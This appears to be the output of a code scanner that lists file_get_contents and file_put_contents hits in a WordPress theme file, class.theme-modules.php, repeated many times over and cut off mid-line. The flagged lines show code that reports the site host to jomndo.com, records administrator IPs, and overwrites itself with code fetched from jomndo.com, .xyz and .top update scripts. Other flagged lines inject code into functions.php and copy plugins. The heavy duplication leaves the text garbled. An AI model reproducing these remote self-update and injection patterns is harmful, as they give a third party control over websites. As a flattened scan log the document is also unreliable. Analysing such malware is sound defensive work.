AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = 